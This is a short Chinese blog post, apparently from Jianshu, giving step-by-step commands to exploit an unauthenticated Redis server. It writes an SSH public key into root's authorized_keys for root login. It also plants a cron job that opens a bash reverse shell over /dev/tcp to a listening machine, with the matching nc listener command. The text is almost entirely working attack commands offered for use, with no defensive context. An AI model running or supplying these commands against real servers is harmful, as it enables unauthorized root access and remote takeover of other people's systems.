redis 漏洞利用

redis 漏洞利用

1、未授权访问漏洞

redis-cli -h 10.20.10.204 -p 6379
config set dir /root/.ssh
config set dbfilename authorized_keys
本机创建ssh密钥对
redis设置ssh公钥 
set x "\n\n\n pub-key \n\n\n"
私钥登陆
ssh root@10.20.10.204 -i ./id_rsa

2.定时计划反弹shell

        受害机:     
        redis :
        1)set x “\n* * * * * bash -i >& /dev/tcp/10.20.10.204/12345 0>&1\n”

                2)config set dir /var/spool/cron/

                3)config set dbfilename root

                4)save
                
        bash -c "bash -i >& /dev/tcp/10.20.10.204/12345 0>&1 2>&1"
        
        
        攻击机 nc -lvp 12345
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。